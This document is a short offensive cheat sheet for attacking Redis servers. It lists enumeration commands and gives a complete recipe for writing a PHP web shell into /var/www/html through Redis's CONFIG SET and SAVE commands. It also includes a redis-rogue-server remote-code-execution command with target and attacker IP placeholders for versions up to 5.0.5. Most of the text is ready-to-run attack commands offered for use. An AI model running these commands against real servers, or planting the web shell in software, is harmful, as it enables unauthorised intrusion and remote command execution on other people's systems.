Redis
Redis is an In-Memory Data Structure store used as a Database, cache, message ber, and Streaming Engine.
:: Redis
6379/TCP
Redis Security
Redis does not try to implement Access Control, it provides a tiny layer of optional Authentication that is turned ON by Editing the redis.conf file. The password is set by the System Administrator in Clear-Text inside the redis.conf file.
:: Authenticating in Redis
AUTH <username> <password>
Enumeration
:: Show Database Information
INFO
:: Show Database Configuration
CONFIG GET *
:: Show Connected Clients
client list
PHP Web-Shell
Only Possible If We Know the
Path of the Website Folder:: Apache PATH
config set dir /var/www/html
:: Filename
config set dbfilename web_shell.php
:: PAYLOAD
set test "<?php system($_GET['cmd']);?>"
save
Redis Rogue Server
Redis RCE
Works only on Version: <=5.0.5
redis-rogue-server --rhost <TARGET_IP> --lhost <ATTACKER_IP>